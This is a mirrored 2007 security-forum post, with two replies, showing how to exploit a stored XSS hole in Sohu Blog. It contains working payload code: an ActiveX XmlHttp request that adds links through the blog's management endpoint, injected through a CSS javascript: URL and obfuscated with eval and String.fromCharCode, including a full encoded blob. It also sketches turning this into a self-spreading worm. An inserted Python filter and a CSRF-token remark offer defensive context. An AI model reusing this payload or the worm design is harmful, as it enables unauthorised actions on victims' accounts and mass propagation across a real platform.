BBYR Achieve
This is a mirrored post. Source: 北邮人论坛 / security / #7462, synced on 2007/1/13

Sohu Blog ajax vulnerability analysis [repost]

kissblue
2007/1/13 · mirror sync · 2 replies
Sohu Blog has an ajax hacking vulnerability that can be turned into a web worm. The concrete exploitation method follows.

A standard ajax data submission; the XmlHttp approach used here is the standard method documented on Microsoft's MSDN:

<script type="text/javascript">
window.onload=function() {
  var XmlHttp=new ActiveXObject("Microsoft.XMLhttp");
  XmlHttp.Open("get","http://blog.sohu.com/manage/link.do?m=add&title=Monyer&desc=Monyer%20is%20my%20hero%20%21&link=http%3A//hi.baidu.com/monyer&_",true);
  XmlHttp.send(null);
  XmlHttp.onreadystatechange=ServerProcess;
}
function ServerProcess() {
  if (XmlHttp.readystate==4 || XmlHttp.readystate=='complete') {
    alert(XmlHttp.responseText);
  }
}
</script>

Compress the code above onto a single line:

window.onload=function(){var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","http://blog.sohu.com/manage/link.do?m=add&title=Monyer&desc=Monyer%20is%20my%20hero%20%21&link=http%3A//hi.baidu.com/monyer&_",true); XmlHttp.send(null);}

How the vulnerability is exploited:

<div style="background-image:url(javascript:[code])">
This cannot execute multiple statements, so switch to the eval form below:

<div style="background-image:url(javascript:eval([code]))">
The code contains quotes, so switch to the String.fromCharCode form below:

<div style="background-image:url(javascript:eval(String.fromCharCode([code as decimal char codes])))">
That does the job.

Inside eval the code runs on its own, so window.onload is no longer needed, and the function wrapper can be dropped as well:

var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","http://blog.sohu.com/manage/link.do?m=add&title=Monyer&desc=Monyer%20is%20my%20hero%20%21&link=http%3A//hi.baidu.com/monyer&_",true); XmlHttp.send(null);

Encode the code above with String.fromCharCode [...] which gives the following code. It executes, but Sohu filters it out, so it needs a further layer of encoding!

<div style="background-image:url(javascript:eval(String.fromCharCode(118,97,114,32,88,109,108,72,116,116,112,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,104,116,116,112,34,41,59,32,88,109,108,72,116,116,112,46,79,112,101,110,40,34,103,101,116,34,44,34,104,116,116,112,58,47,47,98,108,111,103,46,115,111,104,117,46,99,111,109,47,109,97,110,97,103,101,47,108,105,110,107,46,100,111,63,109,61,97,100,100,38,116,105,116,108,101,61,77,111,110,121,101,114,38,100,101,115,99,61,77,111,110,121,101,114,37,50,48,105,115,37,50,48,109,121,37,50,48,104,101,114,111,37,50,48,37,50,49,38,108,105,110,107,61,104,116,116,112,37,51,65,47,47,104,105,46,98,97,105,100,117,46,99,111,109,47,109,111,110,121,101,114,38,95,34,44,116,114,117,101,41,59,32,88,109,108,72,116,116,112,46,115,101,110,100,40,110,117,108,108,41,59)))">

The result after encoding it once more:

<div style="BACKGROUND-image:[...]"></div>

Once this is placed in an article, everyone who visits my space gets the link added automatically. If window.location.href is also added on their page, you get real worm behaviour that spreads without limit: everyone hit becomes a puppet, and the number grows geometrically until it has reached every Sohu user!
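The post shows a blacklist filter on Sohu's side being sidestepped by recasing the property name and re-encoding the payload. The check below is an added example (not code from the post, and not Sohu's filter): instead of searching for the string "javascript", it undoes the obfuscation layers the post relies on (HTML entities, embedded whitespace, mixed case) and then allowlists the URL scheme inside url(), rejecting everything else. The sample style values are constructed for the demonstration and are not the post's real payload.

```python
import html
import re

# Allowlist: only these schemes may appear inside url(); javascript:,
# vbscript:, data: and anything unknown are rejected by default.
ALLOWED_SCHEMES = {"http", "https"}

# Other CSS constructs that executed script in browsers of that era.
BLOCKED_TOKENS = ("expression(", "behavior:", "-moz-binding:", "@import")

# Matches url(...) with optional quotes; DOTALL so a newline cannot split it.
URL_RE = re.compile(r"url\(\s*(['\"]?)(.*?)\1\s*\)", re.IGNORECASE | re.DOTALL)

# Constructed samples in the shape of the post's vector (not its real blob).
SAMPLES = {
    "plain":    'background-image:url(javascript:eval(String.fromCharCode(49)))',
    "upper":    'BACKGROUND-IMAGE:URL(JavaScript:eval(String.fromCharCode(49)))',
    "entities": 'background-image:url(&#106;avascript:eval(1))',
    "tabbed":   'background-image:url(java\tscript:eval(1))',
    "expr":     'width:expression(eval(1))',
    "benign":   'background-image:url(http://example.com/bg.png);color:red',
    "relative": 'background-image:url(/img/bg.png)',
}

def _decode(value: str) -> str:
    """Undo the layers a blacklist bypass relies on: HTML entities
    (&#106;avascript), embedded control/whitespace characters, mixed case."""
    value = html.unescape(value)
    value = re.sub(r"[\x00-\x20\x7f]", "", value)
    return value.lower()

def url_scheme(raw_url: str) -> str:
    """Scheme of a url() argument after decoding; '' for relative URLs."""
    m = re.match(r"([a-z][a-z0-9+.-]*):", _decode(raw_url))
    return m.group(1) if m else ""

def style_is_safe(style: str) -> bool:
    """True only if every url() uses an allowlisted scheme and no
    script-bearing CSS construct is present anywhere in the value."""
    decoded = _decode(style)
    if any(token in decoded for token in BLOCKED_TOKENS):
        return False
    for m in URL_RE.finditer(html.unescape(style)):
        scheme = url_scheme(m.group(2))
        if scheme and scheme not in ALLOWED_SCHEMES:
            return False
    return True
```

This only closes the injection vector; the worm also depends on link.do accepting a state-changing GET with nothing tied to the user's session, which needs a separate server-side fix (a per-session token checked on every modifying request).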
2 replies
kissblue #1 · 2007/1/13
A lot of blog systems probably have this vulnerability. pjBLOG?
rebirthatsix #2 · 2007/1/15
Bumping this; I thought Brother Mao had already taken it...